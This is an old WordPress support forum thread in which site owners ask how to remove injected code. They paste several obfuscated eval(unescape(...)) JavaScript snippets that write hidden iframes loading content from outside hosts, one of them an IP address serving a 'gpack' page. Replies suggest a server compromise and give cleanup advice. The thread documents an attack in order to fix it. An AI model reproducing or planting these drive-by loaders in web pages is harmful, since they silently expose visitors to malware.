harffull codes (eval( unescape( “function check_%)

samsun55
(@samsun55)

16 years ago

hello, in some web site I designed, I have a problem follow as, these codes are inserted into my web pages? What can I solve this problem, thanks….
<!– /ad –><Script>
<!–
var d=document;
eval( unescape( “%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d%27%63%31%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%36%32%39%32%29%2b%27%39%63%36%34%32%34%5c%27%20%77%69%64%74%68%3d%31%35%33%20%68%65%69%67%68%74%3d%35%36%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b” )); var c1439772935;
//–>
</Script>

Viewing 10 replies - 1 through 10 (of 10 total)

planningqueen
(@planningqueen)

16 years ago

I have the same error as well which would have occurred at about the same time. Have you found a solution?

marsie
(@marsie)

15 years, 12 months ago

Same issue here. I have been searching online for a total solution to removing this from my WordPress installation. This has happened to me once before — and the malware code was in my footer.php file. I’m annoyed because it came back… Not sure why or how! Can anyone help?

This is the code appended after my closing </body> tag:

<script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%64%30%38%34%65%37%30%64%62%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%33%36%30%30%29%2b%27%39%61%62%34%38%34%63%62%31%36%5c%27%20%77%69%64%74%68%3d%34%30%30%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29”)); </script>
<script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%35%66%38%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%33%37%38%29%2b%27%39%63%39%5c%27%20%77%69%64%74%68%3d%31%36%32%20%6

marsie
(@marsie)

15 years, 12 months ago

Typo — I found the malicious code in both: index.php and wp-admin/index.php (not footer.php).

Michael Torbert
(@hallsofmontezuma)

WordPress Virtuoso

15 years, 12 months ago

It’s compiled javascript. Often, WordPress theme designers will include it in their themes to keep you from removing credits or ads that they embed without your knowledge. It could also be the fruit of a malicious attack. Just remove it in your code, and then install the security plugin for WordPress to help keep it from happening in the future.

marsie
(@marsie)

15 years, 12 months ago

Update: I also found the damn code on every other index.php file in my entire server!

Additional corrupted files: wp-content/index.php, theme1/index.php, theme2/index.php (and every other theme index file).

I am manually deleting the malicious code on every file… But I still can’t figure out where this came from! I did some reading online and I am thinking it might be attributable to my SiteMeter counter (but am not positive).

marsie
(@marsie)

15 years, 12 months ago

hey hallsofmontezuma, i’ll try the security plugin you suggested. thanks!

planningqueen
(@planningqueen)

15 years, 12 months ago

hallsof montezuma. thanks for the advice – i had found the code and it was in my footer and once removed my feed became valid. i will also check out the security plug in.

I have another problem though in that my stats counter and wordpress stats are no longer working. this happened today but I made the changes to the footer on the weekend. could there be a link?

Moderator Samuel Wood (Otto)
(@otto42)

WordPress.org Admin

15 years, 12 months ago

Update: I also found the damn code on every other index.php file in my entire server!

This indicates that somebody cracked into your server itself and ran some sort of script which added those lines everywhere it could find to add them.

WordPress security is only as good as the box’s own security.

cave-bit
(@cave-bit)

15 years, 11 months ago

the problem is ever equal.Only admin inserted code in file width manage file in admin page.
If code change someone work….
See in your users-table (mysql) if exist phantom user…(width WordPress name for example……….)

nebhead
(@nebhead)

15 years, 5 months ago

I also have this issue on my site. I discovered that all of my index.php files were modified. Anyone know if there are any rogue WP Plugins that may be suspect?